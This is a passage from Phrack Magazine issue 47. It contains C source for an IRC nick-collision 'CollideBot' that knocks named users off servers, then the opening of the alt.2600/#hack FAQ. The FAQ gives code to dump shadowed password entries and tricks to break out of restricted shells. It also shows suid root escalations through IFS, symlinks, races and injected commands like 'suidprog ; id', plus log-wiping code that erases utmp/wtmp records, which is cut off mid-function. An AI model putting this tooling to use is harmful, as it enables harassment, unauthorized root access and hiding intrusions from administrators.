  5011.   kradprsn = argv[1];
  5012.   dedprsn  = argv[2];
  5013.  
  5014.   if(argc<3)
  5015.     exit(1);
  5016.  
  5017.   if(argc==4) {
  5018.     char *port=strchr(argv[3],':');
  5019.     sport=(port)?atoi(port+1):sport;
  5020.     strcpy(serverhost,argv[3]);
  5021.     if(port)
  5022.       serverhost[port-argv[3]]=(char)0;
  5023.   }
  5024.   else
  5025.     strcpy(serverhost,SERVER);
  5026.  
  5027.   signal(SIGPIPE,(void *)signal_handler);
  5028.   signal(SIGHUP,(void *)signal_handler);
  5029.   signal(SIGINT,(void *)signal_handler);
  5030.   signal(SIGTERM,(void *)signal_handler);
  5031.   signal(SIGBUS,(void *)signal_handler);
  5032.   signal(SIGABRT,(void *)signal_handler);
  5033.   signal(SIGSEGV,(void *)signal_handler);
  5034.   signal(SIGALRM,(void *)signal_alarm);
  5035.  
  5036.   errno=0;
  5037.   if((sock=socket(AF_INET,SOCK_STREAM,0))>0) {
  5038.     server.sin_family=AF_INET;
  5039.     server.sin_port=htons(sport);
  5040.     printf("Resolving %s...",serverhost); fflush(stdout);
  5041.     if((server.sin_addr.s_addr=resolver(serverhost))) {
  5042.       puts("done");
  5043.  
  5044.       setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  5045.       setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  5046.       setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  5047.  
  5048.       fcntl(sock,F_SETFL,(fcntl(sock,F_GETFL)|O_NONBLOCK));
  5049.  
  5050.       printf("Connecting to %s...",inet_ntoa(server.sin_addr));
  5051.       fflush(stdout);
  5052.  
  5053.       errno=0;
  5054.       if(connect(sock,(struct sockaddr *)&server,sizeof(server))) {
  5055.         if(errno!=EINPROGRESS && errno!=EWOULDBLOCK)
  5056.           exit_program((char *)errno);
  5057.         else
  5058.           session=INPROGRESS;
  5059.       }
  5060.       else
  5061.         init_server();
  5062.  
  5063.       gethostname(hostname,64);
  5064.       process_server();
  5065.     }
  5066.     else
  5067.       exit_program("resolve failed");
  5068.   }
  5069.   else
  5070.     printf("Failed to allocate an AF_INET socket. (%s)\n",(char *)errno);
  5071. }
  5072.  
  5073. ------------------------------------------------------------------------------
  5074.  
  5075. /*===============================*\
  5076. |*  MCB - Multi-CollideBot v1.5a *|
  5077. |*     Written by Dr. Delete     *|
  5078. |* Basically just a way to make  *|
  5079. |* several TCP connections to a  *|
  5080. |* server in one small process.  *|
  5081. \*===============================*/
  5082.  
  5083. #include <stdio.h>
  5084. #include <stdlib.h>
  5085. #include <string.h>
  5086. #include <unistd.h>
  5087. #include <sys/types.h>
  5088. #include <fcntl.h>
  5089. #include <signal.h>
  5090. #include <errno.h>
  5091. #include <sys/socket.h>
  5092. #include <sys/time.h>
  5093. #include <sys/wait.h>
  5094. #include <netinet/in.h>
  5095. #include <netdb.h>
  5096. #include <fcntl.h>
  5097. #include <sys/file.h>
  5098. #include <arpa/inet.h>
  5099.  
  5100. #define BUFSIZE 350
  5101. #define MAXSESSIONS 256
  5102. #define BOTTIMEOUT 900 /* 15 minutes (900 seconds) bot lifetime */
  5103.  
  5104. struct sockaddr_in server;
  5105.  
  5106. char buf[BUFSIZE];
  5107. char *kradprsn;
  5108.  
  5109. struct ircsession {
  5110.    int sock;
  5111.    char stack[BUFSIZE*2];
  5112.    char *server;
  5113.    char *nick;
  5114.    int stat;
  5115. } session[MAXSESSIONS];
  5116.  
  5117. int sessions,total_sessions;
  5118.  
  5119. char *nickpick="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`_";
  5120. #define NICKLEN 54
  5121.  
  5122. void sig_pipe(void) {
  5123.    puts("Odd, I just caught a SIGPIPE.");
  5124.    signal(SIGPIPE,(void *)sig_pipe);
  5125. }
  5126.  
  5127. void fillran(char *s,int len) {
  5128.    while(len--)
  5129.      *s++=*((nickpick)+(rand()%NICKLEN));
  5130.    *s=0;
  5131. }
  5132.  
  5133. int strnccmp(register char *s1,register char *s2,register int n) {
  5134.    if(n==0) return(0);
  5135.    do {
  5136.      if((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)!=(((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++))
  5137.        return (*(unsigned char *)s1-*(unsigned char *)--s2);
  5138.      if(*s1++==0) break;
  5139.    } while(--n!=0);
  5140.    return(0);
  5141. }
  5142.  
  5143. char *mycstrstr(char *str1,char *str2) {
  5144.    int xstr1len,ystr2len;
  5145.  
  5146.    xstr1len=strlen(str1);
  5147.    ystr2len=strlen(str2);
  5148.  
  5149.    while(xstr1len && strnccmp(str1++,str2,ystr2len) && xstr1len-->=ystr2len);
  5150.    if(!xstr1len || xstr1len<ystr2len || !ystr2len) return(0);
  5151.    return(str1-1);
  5152. }
  5153.  
  5154. void out(int fd, char *s) {
  5155.   write(fd,s,strlen(s));
  5156. }
  5157.  
  5158. void cclosed(int sessionum) {
  5159.    if(session[sessionum].sock)
  5160.      shutdown(session[sessionum].sock,2);
  5161.    close(session[sessionum].sock);
  5162.    session[sessionum].sock=0;
  5163.    printf("%s: Connection to %s closed.\n",session[sessionum].nick,session[sessionum].server); fflush(stdout);
  5164.    if(!sessions || !total_sessions) {
  5165.      puts("CollideBot finished.");
  5166.      exit(0);
  5167.    }
  5168. }
  5169.  
  5170. void quitprog(void) {
  5171.    printf("Signal received! CollideBot exiting. %d sessions still active.\n",sessions); fflush(stdout);
  5172.    while(total_sessions--)
  5173.      if(session[total_sessions].sock) {
  5174.         out(session[total_sessions].sock,"QUIT :signal received\r\n");
  5175.         cclosed(total_sessions);
  5176.      }
  5177.    puts("CollideBot finished.");
  5178.    exit(0);
  5179. }
  5180.  
  5181. unsigned long int resolver(char *host) {
  5182.    int x=0;
  5183.    unsigned long int tempresl;
  5184.    struct hostent *he;
  5185.  
  5186.    if(sscanf(host,"%d.%d.%d.%d",&x,&x,&x,&x)==4 || !strcmp(host,"0"))
  5187.      return(inet_addr(host));
  5188.    while(!(he=gethostbyname((char *)host)) && x++<3)
  5189.      sleep(1);
  5190.    if(x<3)
  5191.      return(htonl((unsigned long int)((unsigned char)he->h_addr_list[0][0]*
  5192.             (unsigned int)256+(unsigned char)he->h_addr_list[0][1])*
  5193.             (unsigned int)65536+(unsigned long int)((unsigned char)
  5194.             he->h_addr_list[0][2]*(unsigned int)256+(unsigned char)
  5195.             he->h_addr_list[0][3])));
  5196.    printf("Unable to resolve %s!\n",host);
  5197.    return(0);
  5198. }
  5199.  
  5200. void estab2(int sock,char *ircservername,char *nick) {
  5201.   char tempnick[10];
  5202.  
  5203.   printf("%s: Connection to %s established.\n",nick,ircservername); fflush(stdout);
  5204.   fillran(tempnick,9);
  5205.   sprintf(buf,"USER %s %s %s %s\r\nNICK %s\r\nPRIVMSG %s :%s iz ded, woowoo\r\n",tempnick,tempnick,tempnick,tempnick,(!strnccmp(nick,kradprsn,5)) ? tempnick : nick, kradprsn, nick);
  5206.   fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) & ~O_NDELAY));
  5207.   out(sock,buf);
  5208. }
  5209.  
  5210. int estab(unsigned long int ircserver,char *ircservername,int x) {
  5211.   int sock;
  5212.  
  5213.   sock=socket(AF_INET,SOCK_STREAM,0);
  5214.   server.sin_family=AF_INET;
  5215.   server.sin_port=htons(6667);
  5216.   server.sin_addr.s_addr=ircserver;
  5217.   fcntl (sock, F_SETFL, (fcntl(sock, F_GETFL) | O_NDELAY));
  5218.   errno=0;
  5219.   if((session[x].nick[0]==68 || session[x].nick[0]==100) && (session[x].nick[1]==82 || session[x].nick[1]==114) &&
  5220.      (session[x].nick[2]==95) && (session[x].nick[3]==68 || session[x].nick[3]==100) &&
  5221.      (session[x].nick[4]==69 || session[x].nick[4]==101) && (session[x].nick[5]==76 || session[x].nick[5]==108) &&
  5222.      (session[x].nick[6]==69 || session[x].nick[6]==101) && (session[x].nick[7]==84 || session[x].nick[7]==116) &&
  5223.      (session[x].nick[8]==69 || session[x].nick[8]==101)) {
  5224.     printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout);
  5225.     close(sock);
  5226.     return(0);
  5227.   }
  5228.   if(connect(sock,(struct sockaddr *)&server,sizeof(server))<0) {
  5229.     if(errno!=EINPROGRESS) {
  5230.       printf("%s: Connection to %s has failed.\n",session[x].nick,ircservername); fflush(stdout);
  5231.       close(sock);
  5232.       return(0);
  5233.     }
  5234.     else 
  5235.       session[x].stat=2;
  5236.   }
  5237.   else {
  5238.     estab2(sock,ircservername,session[x].nick);
  5239.     session[x].stat=0;
  5240.   }
  5241.   return(sock);
  5242. }
  5243.  
  5244. void parse2(char *buf,int len,int sessionum) {
  5245.   char *num;
  5246.   if((num=mycstrstr(buf," ")))
  5247.     if(atoi((num+1))==372)
  5248.       return;
  5249.   if(!strnccmp(buf,"PING",4)) {
  5250.     buf[1]='O';
  5251.     out(session[sessionum].sock,(char *)buf);
  5252.     out(session[sessionum].sock,"\r\n");
  5253.   }
  5254.   else if(mycstrstr(buf,"already in use")) {
  5255.     printf("%s: Nickname already in use.\n",session[sessionum].nick);
  5256.     out(session[sessionum].sock,"QUIT\r\n");
  5257.   }
  5258.   else if(mycstrstr(buf,"kill") && !session[sessionum].stat++)
  5259.     printf("%s: SCORE!\n",session[sessionum].nick);
  5260.   else if(mycstrstr(buf,"authoriz"))
  5261.     printf("%s: Not authorized to use server.\n",session[sessionum].nick);
  5262.   else if(mycstrstr(buf,"ghosts"))
  5263.     printf("%s: Banned from this IRC server.\n",session[sessionum].nick);
  5264. }
  5265.  
  5266. void parse(unsigned char *buf,int rl,int sessionum) {
  5267.   int x=0,len;
  5268.  
  5269.   strcat(session[sessionum].stack,buf);
  5270.   len=strlen(session[sessionum].stack);
  5271.   while(session[sessionum].stack[x]!=13 && session[sessionum].stack[x]!=10 && session[sessionum].stack[x])
  5272.     x++;
  5273.   if(session[sessionum].stack[x]) {
  5274.     session[sessionum].stack[x]=0;
  5275.     parse2(session[sessionum].stack,x+1,sessionum);
  5276.     if(len>=(x+1)) {
  5277.       strcpy(buf,(char *)&session[sessionum].stack[x+1]);
  5278.       session[sessionum].stack[0]=0;
  5279.       parse(buf,len-(x+1),sessionum);
  5280.     }
  5281.     else
  5282.       session[sessionum].stack[0]=0;
  5283.   }
  5284. }
  5285.  
  5286. void process_servers(int secs) {
  5287.     fd_set rd,wr;
  5288.     int x,length,selectr=1;
  5289.     struct timeval timeout;
  5290.  
  5291.     while(selectr>0) {
  5292.  
  5293.       timeout.tv_usec=0;
  5294.       timeout.tv_sec=secs;
  5295.  
  5296.       errno=0;
  5297.       FD_ZERO(&rd);
  5298.       FD_ZERO(&wr);
  5299.       for(x=0;x<total_sessions;x++)
  5300.         if(session[x].sock)
  5301.           if(session[x].stat!=2)
  5302.             FD_SET(session[x].sock,&rd);
  5303.           else
  5304.             FD_SET(session[x].sock,&wr);
  5305.  
  5306.       selectr=select(getdtablesize(),&rd,&wr,NULL,(secs<0) ? NULL : (struct timeval *)&timeout);
  5307.       if(errno==EINTR)
  5308.         continue;
  5309.  
  5310.       for(x=0;x<total_sessions;x++)
  5311.         if(FD_ISSET(session[x].sock,&wr)) {
  5312.           session[x].stat=0;
  5313.           estab2(session[x].sock,session[x].server,session[x].nick);
  5314.         }
  5315.         else if(session[x].stat!=2 && FD_ISSET(session[x].sock,&rd)) {
  5316.           if(!(length=read(session[x].sock,buf,BUFSIZE-1))) {
  5317.             sessions--;
  5318.             cclosed(x);
  5319.         continue;
  5320.           }
  5321.           buf[length]=0;
  5322.           parse(buf,length,x);
  5323.         }
  5324.     }
  5325. }
  5326.  
  5327. void main(int argc,char *argv[]) {
  5328.   unsigned short int pid,x;
  5329.   unsigned long int ircserver=0;
  5330.   char *lastnick=0;
  5331.  
  5332.   if(argc<3)
  5333.     exit(0);
  5334.  
  5335.   kradprsn = argv[1];
  5336.  
  5337.   /* if((pid=fork())) {
  5338.     printf("Process ID %d.\n",pid);
  5339.     exit(0);
  5340.   } */
  5341.   
  5342.   sessions=total_sessions=0;
  5343.  
  5344.   srand(getpid());
  5345.  
  5346.   signal(SIGHUP,(void *)quitprog);
  5347.   signal(SIGTERM,(void *)quitprog);
  5348.   signal(SIGABRT,(void *)quitprog);
  5349.   signal(SIGINT,(void *)quitprog);
  5350.   signal(SIGPIPE,(void *)sig_pipe);
  5351.  
  5352.   for(x=1;x<argc-1 && x<MAXSESSIONS;x++) {
  5353.     char *tempp,*default_server;
  5354.     unsigned long int tempserver;
  5355.     session[x].nick=(argv[x+1][0]=='@') ? (char *)&argv[x+1][1] : argv[x+1];
  5356.     if((tempp=mycstrstr(argv[x+1],":"))) {
  5357.       *tempp=0;
  5358.       lastnick=session[x].nick;
  5359.       tempserver=ircserver;
  5360.       ircserver=resolver(tempp+1);
  5361.       if(ircserver)
  5362.         default_server=tempp+1;
  5363.       else
  5364.         ircserver=tempserver;
  5365.     }
  5366.     else if(mycstrstr(argv[x+1],".")) {
  5367.       if(!lastnick) {
  5368.         printf("Error: No default nickname to use for connection to %s!\n",argv[x+1]);
  5369.         continue;
  5370.       }
  5371.       tempserver=ircserver;
  5372.       ircserver=resolver(argv[x+1]);
  5373.       if(ircserver)
  5374.         default_server=argv[x+1];
  5375.       else
  5376.         ircserver=tempserver;
  5377.       session[x].nick=lastnick;
  5378.     }
  5379.     lastnick=session[x].nick;
  5380.     if(ircserver) {
  5381.       if((session[x].sock=estab(ircserver,default_server,x))) {
  5382.         session[x].stack[0]=0;
  5383.         session[x].server=default_server;
  5384.         sessions++;
  5385.       }
  5386.     }
  5387.     else
  5388.       printf("%s: Error! No default server set.\n",session[x].nick);
  5389.     total_sessions=x+1;
  5390.   }
  5391.  
  5392.   if(sessions<1) {
  5393.     printf("CollideBot Exiting, no established sessions.\n");
  5394.     exit(0);
  5395.   }
  5396.  
  5397.   signal(SIGALRM,(void *)quitprog);
  5398.   alarm(BOTTIMEOUT);
  5399.  
  5400.   while(1)
  5401.     
  5402.  
  5403. ------------------------------------------------------------------------------
  5404.  
  5405.  
  5406.                               ==Phrack Magazine==
  5407.  
  5408.                  Volume Six, Issue Forty-Seven, File 5 of 22
  5409.  
  5410.  
  5411.  
  5412. Editors Note: Welcome to special release of the alt.2600/#hack FAQ for
  5413.               Phrack Magazine!
  5414.  
  5415.               The purpose of this FAQ is to give you a general
  5416.               introduction to the topics covered on alt.2600 and
  5417.               #hack.  No document will make you a hacker.
  5418.  
  5419.               If you have a question regarding any of the topics
  5420.               covered in the FAQ, please direct it to alt.2600 or
  5421.               #hack.  Please do not e-mail me with them, I'm getting
  5422.               swamped.
  5423.  
  5424.               If your copy of the alt.2600/#hack FAQ does not end with
  5425.               the letters EOT on a line by themselves, you do not have
  5426.               the entire FAQ.
  5427.  
  5428.  
  5429.                                     The
  5430.  
  5431.                 alt.2600/#Hack F.A.Q.
  5432.  
  5433.                      Special release for Phrack Magazine
  5434.  
  5435.                         A TNO Communication Production
  5436.  
  5437.                                     by
  5438.  
  5439.                                   Voyager
  5440.                 will@gnu.ai.mit.edu
  5441.  
  5442.                 Sysop of
  5443.                  Hacker's Haven
  5444.                   (303)343-4053
  5445.  
  5446.                          With greets going out to:
  5447.  
  5448.         A-Flat, Al, Aleph1, Bluesman, Cavalier, C-Curve, DeadKat,
  5449.         Disorder, Edison, Erik Bloodaxe, Hobbit, KCrow, Major,
  5450.         Marauder, Novocain, Outsider, Presence, Rogue Agent, sbin,
  5451.         Taran King, Theora, ThePublic, Tomes and TheSaint.
  5452.  
  5453.  
  5454.                We work in the dark
  5455.                We do what we can
  5456.                We give what we have
  5457.                Our doubt is our passion,
  5458.                and our passion is our task
  5459.                The rest is the madness of art.
  5460.  
  5461.                 -- Henry James
  5462.  
  5463.  
  5464.  
  5465. Section A: Computers
  5466.  
  5467.   01. How do I access the password file under Unix?
  5468.   02. How do I crack Unix passwords?
  5469.   03. What is password shadowing?
  5470.   04. Where can I find the password file if it's shadowed?
  5471.   05. What is NIS/yp?
  5472.   06. What are those weird characters after the comma in my passwd file?
  5473.   07. How do I access the password file under VMS?
  5474.   08. How do I crack VMS passwords?
  5475.   09. How do I break out of a restricted shell?
  5476.   10. How do I gain root from a suid script or program?
  5477.   11. How do I erase my presence from the system logs?
  5478.   12. How do I send fakemail?
  5479.   13. How do I fake posts to UseNet?
  5480.   14. How do I hack ChanOp on IRC?
  5481.   15. How do I modify the IRC client to hide my real username?
  5482.   16. How to I change to directories with strange characters in them?
  5483.   17. What is ethernet sniffing?
  5484.   18. What is an Internet Outdial?
  5485.   19. What are some Internet Outdials?
  5486.   20. What is this system?
  5487.   21. What are the default accounts for XXX ?
  5488.   22. What port is XXX on?
  5489.   23. What is a trojan/worm/virus/logic bomb?
  5490.   24. How can I protect myself from viruses and such?
  5491.   25. Where can I get more information about viruses?
  5492.   26. What is Cryptoxxxxxxx?
  5493.   27. What is PGP?
  5494.   28. What is Tempest?
  5495.   29. What is an anonymous remailer?
  5496.   30. What are the addresses of some anonymous remailers?
  5497.   31. How do I defeat copy protection?
  5498.   32. What is 127.0.0.1?
  5499.   33. How do I post to a moderated newsgroup?
  5500.  
  5501.  
  5502. Section B: Telephony
  5503.  
  5504.   01. What is a Red Box?
  5505.   02. How do I build a Red Box?
  5506.   03. Where can I get a 6.5536Mhz crystal?
  5507.   04. Which payphones will a Red Box work on?
  5508.   05. How do I make local calls with a Red Box?
  5509.   06. What is a Blue Box?
  5510.   07. Do Blue Boxes still work?
  5511.   08. What is a Black Box?
  5512.   09. What do all the colored boxes do?
  5513.   10. What is an ANAC number?
  5514.   11. What is the ANAC number for my area?
  5515.   12. What is a ringback number?
  5516.   13. What is the ringback number for my area?
  5517.   14. What is a loop?
  5518.   15. What is a loop in my area?
  5519.   16. What is a CNA number?
  5520.   17. What is the telephone company CNA number for my area?
  5521.   18. What are some numbers that always ring busy?
  5522.   19. What are some numbers that temporarily disconnect phone service?
  5523.   20. What is scanning?
  5524.   21. Is scanning illegal?
  5525.   22. Where can I purchase a lineman's handset?
  5526.   23. What are the DTMF frequencies?
  5527.   24. What are the frequencies of the telephone tones?
  5528.   25. What are all of the * (LASS) codes?
  5529.   26. What frequencies do cordless phones operate on?
  5530.   27. What is Caller-ID?
  5531.   28. What is a PBX?
  5532.   29. What is a VMB?
  5533.  
  5534.  
  5535. Section C: Resources
  5536.  
  5537.   01. What are some ftp sites of interest to hackers?
  5538.   02. What are some fsp sites of interest to hackers?
  5539.   03. What are some newsgroups of interest to hackers?
  5540.   04. What are some telnet sites of interest to hackers?
  5541.   05. What are some gopher sites of interest to hackers?
  5542.   06. What are some World wide Web (WWW) sites of interest to hackers?
  5543.   07. What are some IRC channels of interest to hackers?
  5544.   08. What are some BBS's of interest to hackers?
  5545.   09. What are some books of interest to hackers?
  5546.   10. What are some videos of interest to hackers?
  5547.   11. What are some mailing lists of interest to hackers?
  5548.   12. What are some print magazines of interest to hackers?
  5549.   13. What are some e-zines of interest to hackers?
  5550.   14. What are some organizations of interest to hackers?
  5551.   15. Where can I purchase a magnetic stripe encoder/decoder?
  5552.   16. What are the rainbow books and how can I get them?
  5553.  
  5554.  
  5555. Section D: 2600
  5556.  
  5557.   01. What is alt.2600?
  5558.   02. What does "2600" mean?
  5559.   03. Are there on-line versions of 2600 available?
  5560.   04. I can't find 2600 at any bookstores.  What can I do?
  5561.   05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  5562.  
  5563.  
  5564. Section E: Phrack Magazine
  5565.  
  5566.   01. What is Phrack Magazine?
  5567.   02. How can I reach Phrack Magazine?
  5568.   03. Who Publishes Phrack?
  5569.   04. How often does Phrack go out?
  5570.   05. How do I subscribe?
  5571.   06. Why don't I get any response when I email Phrack?
  5572.   07. Does Phrack cost money?
  5573.   08. How can I submit articles?
  5574.   09. What is Phrack's PGP key?
  5575.   10. Where can I get back issues?
  5576.  
  5577.  
  5578. Section F: Miscellaneous
  5579.  
  5580.   01. What does XXX stand for?
  5581.   02. How do I determine if I have a valid credit card number?
  5582.   03. What bank issued this credit card?
  5583.   04. What are the ethics of hacking?
  5584.   05. Where can I get a copy of the alt.2600/#hack FAQ?
  5585.  
  5586.  
  5587. Section A: Computers
  5588. ~~~~~~~~~~~~~~~~~~~~
  5589.  
  5590. 01. How do I access the password file under Unix?
  5591.  
  5592. In standard Unix the password file is /etc/passwd.  On a Unix system
  5593. with either NIS/yp or password shadowing, much of the password data
  5594. may be elsewhere.
  5595.  
  5596.  
  5597. 02. How do I crack Unix passwords?
  5598.  
  5599. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  5600. passwords are encrypted with a one way function.  The login program
  5601. encrypts the text you enter at the "password:" prompt and compares
  5602. that encrypted string against the encrypted form of your password.
  5603.  
  5604. Password cracking software uses wordlists.  Each word in the wordlist
  5605. is encrypted and the results are compared to the encrypted form of the
  5606. target password.
  5607.  
  5608. The best cracking program for Unix passwords is currently Crack by
  5609. Alec Muffett.  For PC-DOS, the best package to use is currently
  5610. CrackerJack.
  5611.  
  5612.  
  5613. 03. What is password shadowing?
  5614.  
  5615. Password shadowing is a security system where the encrypted password
  5616. field of /etc/passwd is replaced with a special token and the
  5617. encrypted password is stored in a separate file which is not readable
  5618. by normal system users.
  5619.  
  5620. To defeat password shadowing on many (but not all) systems, write a
  5621. program that uses successive calls to getpwent() to obtain the
  5622. password file.
  5623.  
  5624. Example:
  5625.  
  5626. #include <pwd.h>
  5627. main()
  5628. {
  5629. struct passwd *p;
  5630. while(p=getpwent())
  5631. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  5632. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  5633. }
  5634.  
  5635.  
  5636. 04. Where can I find the password file if it's shadowed?
  5637.  
  5638. Unix                  Path                            Token
  5639. -----------------------------------------------------------------
  5640. AIX 3                 /etc/security/passwd            !
  5641.        or             /tcb/auth/files/<first letter   #
  5642.                             of username>/<username>
  5643. A/UX 3.0s             /tcb/files/auth/?/*
  5644. BSD4.3-Reno           /etc/master.passwd              *
  5645. ConvexOS 10           /etc/shadpw                     *
  5646. ConvexOS 11           /etc/shadow                     *
  5647. DG/UX                 /etc/tcb/aa/user/               *
  5648. EP/IX                 /etc/shadow                     x
  5649. HP-UX                 /.secure/etc/passwd             *
  5650. IRIX 5                /etc/shadow                     x
  5651. Linux 1.1             /etc/shadow                     *
  5652. OSF/1                 /etc/passwd[.dir|.pag]          *
  5653. SCO Unix #.2.x        /tcb/auth/files/<first letter   *
  5654.                             of username>/<username>
  5655. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  5656. SunOS 5.0             /etc/shadow
  5657.                       <optional NIS+ private secure maps/tables/whatever>
  5658. System V Release 4.0  /etc/shadow                     x
  5659. System V Release 4.2  /etc/security/* database
  5660. Ultrix 4              /etc/auth[.dir|.pag]            *
  5661. UNICOS                /etc/udb                        *
  5662.  
  5663.  
  5664. 05. What is NIS/yp?
  5665.  
  5666. NIS (Network Information System) in the current name for what was once
  5667. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  5668. machines on a network to share configuration information, including
  5669. password data.  NIS is not designed to promote system security.  If
  5670. your system uses NIS you will have a very short /etc/passwd file that
  5671. includes a line that looks like this:
  5672.  
  5673. +::0:0:::
  5674.  
  5675. To view the real password file use this command "ypcat passwd"
  5676.  
  5677.  
  5678. 06. What are those weird characters after the comma in my passwd file?
  5679.  
  5680. The characters are password aging data.  Password aging forces the
  5681. user to change passwords after a System Administrator specified period
  5682. of time.  Password aging can also force a user to keep a password for
  5683. a certain number of weeks before changing it.
  5684.  
  5685. ]
  5686. ] Sample entry from /etc/passwd with password aging installed:
  5687. ]
  5688. ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  5689. ]
  5690.  
  5691. Note the comma in the encrypted password field.  The characters after
  5692. the comma are used by the password aging mechanism.
  5693.  
  5694. ]
  5695. ] Password aging characters from above example:
  5696. ]
  5697. ] M.z8
  5698. ]
  5699.  
  5700. The four characters are interpreted as follows:
  5701.  
  5702.   1: Maximum number of weeks a password can be used without changing.
  5703.   2: Minimum number of weeks a password must be used before changing.
  5704. 3&4: Last time password was changed, in number of weeks since 1970.
  5705.  
  5706. Three special cases should be noted:
  5707.  
  5708. If the first and second characters are set to '..' the user will be
  5709. forced to change his/her passwd the next time he/she logs in.  The
  5710. passwd program will then remove the passwd aging characters, and the
  5711. user will not be subjected to password aging requirements again.
  5712.  
  5713. If the third and fourth characters are set to '..' the user will be
  5714. forced to change his/her passwd the next time he/she logs in. Password
  5715. aging will then occur as defined by the first and second characters.
  5716.  
  5717. If the first character (MAX) is less than the second character (MIN),
  5718. the user is not allowed to change his/her password.  Only root can
  5719. change that users password.
  5720.  
  5721. It should also be noted that the su command does not check the password
  5722. aging data.  An account with an expired password can be su'd to
  5723. without being forced to change the password.
  5724.  
  5725.  
  5726.                         Password Aging Codes
  5727. +------------------------------------------------------------------------+
  5728. |                                                                        |
  5729. | Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  5730. |    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  5731. |                                                                        |
  5732. | Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
  5733. |    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  5734. |                                                                        |
  5735. | Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
  5736. |    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  5737. |                                                                        |
  5738. | Character:  w  x  y  z                                                 |
  5739. |    Number: 60 61 62 63                                                 |
  5740. |                                                                        |
  5741. +------------------------------------------------------------------------+
  5742.  
  5743.  
  5744. 07. How do I access the password file under VMS?
  5745.  
  5746. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  5747. unlike Unix, most users do not have access to read the password file.
  5748.  
  5749.  
  5750. 08. How do I crack VMS passwords?
  5751.  
  5752. Write a program that uses the SYS$GETUAF functions to compare the
  5753. results of encrypted words against the encrypted data in SYSUAF.DAT.
  5754.  
  5755. Two such programs are known to exist, CHECK_PASSWORD and
  5756. GUESS_PASSWORD.
  5757.  
  5758.  
  5759. 09. How do I break out of a restricted shell?
  5760.  
  5761. On poorly implemented restricted shells you can break out of the
  5762. restricted environment by running a program that features a shell
  5763. function.  A good example is vi.  Run vi and use this command:
  5764.  
  5765. :set shell=/bin/sh
  5766.  
  5767. then shell using this command:
  5768.  
  5769. :shell
  5770.  
  5771.  
  5772. 10. How do I gain root from a suid script or program?
  5773.  
  5774. 1. Change IFS.
  5775.  
  5776. If the program calls any other programs using the system() function
  5777. call, you may be able to fool it by changing IFS.  IFS is the Internal
  5778. Field Separator that the shell uses to delimit arguments.
  5779.  
  5780. If the program contains a line that looks like this:
  5781.  
  5782. system("/bin/date")
  5783.  
  5784. and you change IFS to '/' the shell will them interpret the
  5785. proceeding line as:
  5786.  
  5787. bin date
  5788.  
  5789. Now, if you have a program of your own in the path called "bin" the
  5790. suid program will run your program instead of /bin/date.
  5791.  
  5792. To change IFS, use this command:
  5793.  
  5794. IFS='/';export IFS      # Bourne Shell
  5795. setenv IFS '/'          # C Shell
  5796. export IFS='/'          # Korn Shell
  5797.  
  5798.  
  5799. 2. link the script to -i
  5800.  
  5801. Create a symbolic link named "-i" to the program.  Running "-i"
  5802. will cause the interpreter shell (/bin/sh) to start up in interactive
  5803. mode.  This only works on suid shell scripts.
  5804.  
  5805. Example:
  5806.  
  5807. % ln suid.sh -i
  5808. % -i
  5809. #
  5810.  
  5811.  
  5812. 3. Exploit a race condition
  5813.  
  5814. Replace a symbolic link to the program with another program while the
  5815. kernel is loading /bin/sh.
  5816.  
  5817. Example:
  5818.  
  5819. nice -19 suidprog ; ln -s evilprog suidroot
  5820.  
  5821.  
  5822. 4. Send bad input to the program.
  5823.  
  5824. Invoke the name of the program and a separate command on the same
  5825. command line.
  5826.  
  5827. Example:
  5828.  
  5829. suidprog ; id
  5830.  
  5831.  
  5832. 11. How do I erase my presence from the system logs?
  5833.  
  5834. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  5835. files that can be edited by hand with vi, you must use a program
  5836. specifically written for this purpose.
  5837.  
  5838. Example:
  5839.  
  5840. #include <sys/types.h>
  5841. #include <stdio.h>
  5842. #include <unistd.h>
  5843. #include <sys/file.h>
  5844. #include <fcntl.h>
  5845. #include <utmp.h>
  5846. #include <pwd.h>
  5847. #include <lastlog.h>
  5848. #define WTMP_NAME "/usr/adm/wtmp"
  5849. #define UTMP_NAME "/etc/utmp"
  5850. #define LASTLOG_NAME "/usr/adm/lastlog"
  5851.  
  5852. int f;
  5853.  
  5854. void kill_utmp(who)
  5855. char *who;
  5856. {
  5857.     struct utmp utmp_ent;
  5858.  
  5859.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  5860.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  5861.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  5862.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  5863.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  5864.                  write (f, &utmp_ent, sizeof (utmp_ent));
  5865.             }
  5866.      close(f);
  5867.   }
  5868. }
  5869.  
  5870. void kill_wtmp(who)
  5871. char *who;
  5872. {
  5873.     struct utmp utmp_ent;
  5874.     long pos;
  5875.  
  5876.     pos = 1L;
  5877.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
